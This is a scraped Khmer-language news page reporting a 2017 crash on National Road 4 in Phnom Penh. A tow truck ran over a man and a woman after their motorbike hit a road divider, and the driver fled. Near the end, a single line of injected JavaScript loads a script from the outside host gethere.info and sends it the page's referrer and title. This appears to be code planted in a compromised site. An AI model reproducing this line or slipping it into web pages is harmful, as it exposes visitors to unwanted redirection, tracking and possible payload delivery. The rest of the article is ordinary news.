Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

រថយន្តកិនធ្លាយខួរស្លាប់ទាំងប្រុុសទាំងស្រី មិនដឹងជាកូនចៅអ្នកណា មិនទាន់ស្គាល់អត្តសញ្ញាណទេ!

ភ្នំពេញៈបុរសម្នាក់និងស្ត្រីម្នាក់ត្រូវរថយន្តសណ្តោងរឺម៉កកិនពីលើខ្ទេចក្បាល់ស្លាប់ភ្លាមៗនៅនឹងកន្លែងខណះជិះម៉ូតូឌុបគ្នាមកបុកក្បាលក្លូពុះចែកទ្រូងផ្លូវហើយដួលហើយរថយន្តមកកិនបន្ថែម។ករណីនេះកើតឡើងកាលពីម៉ោង០៣និង៤០នាទីទាបភ្លឺថ្ងៃទី១៥ មក រា២០១៧នៅមុខវត្តជំម្ពូវ័ន្តលើកំណាត់ផ្លូវជាតិលេខ៤ភូមិជំម្ពូវ័ន្តសង្កាត់ចោមចៅខណ្ឌពោធិ៍សែនជ័យ។សពទាំង២នាក់នៅមិនទាន់ស្គាល់អត្តសញ្ញាណនៅឡើយ

ប្រភពបានប្រាប់ថាមុនកើតហេតុបានឃើញបុរសខាងលើជិះម៉ូតូមួយគ្រឿងម៉ាកMSXពណ៌ខ្មៅពាក់ស្លាកលេខភ្នំពេញ1FW-5829 ដោយមានដឹកស្ត្រីម្នាក់ពីក្រោយក្នុងល្បឿនលឿនខណះមកដល់ចំណុចខាងលើបានជ្រុលទៅបុកក្បាលក្លូរពុះចែកទ្រូងផ្លូវពេញទំហឹងបណ្តាលអោយដួលបោកនិងថ្នល់គាប់ជួនពេលនោះមានរថយន្តសណ្តោងរឺម៉កពណ៌ខៀវលាយត្រួយចេកពាក់ស្លាកលេខភ្នំពេញ3B-5187 បើកមកពីក្រោយជាន់ហ្វ្រាំងមិនឍទាន់ក៍កិនទាំង០២នាក់បណ្តាលអោយបែកក្បាលស្លាប់ទាំង២នាក់ភ្លាមៗនៅកន្លែងកើតហេតុតែម្តង។
ប្រភពបានប្រាប់ទៀតថាក្រោយពីកិនហើយរថយន្តបានព្យាយាមបើករត់បានប្រហែល៥០០ម៉ែត្រក៍ទុករថយន្តចោលហើយអ្នកបើកបានកេចខ្លូនបាត់តែម្តង។

ក្រោយកើតហេតុសមត្ថកិច្ចចុះមកវាស់វែងយករថយន្តនិងម៉ូតូទៅរក្សាទុកនៅការិយាល័យចរាចរណ៍ជើងគោករាជធានឍិភ្នំពេញចំណែកសពបានយកដំកល់ទុកនៅវត្តទឹកថ្លារងចាំសាច់ញាតិយកទៅធ្វើបុណ្យតាមប្រពៃណី។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More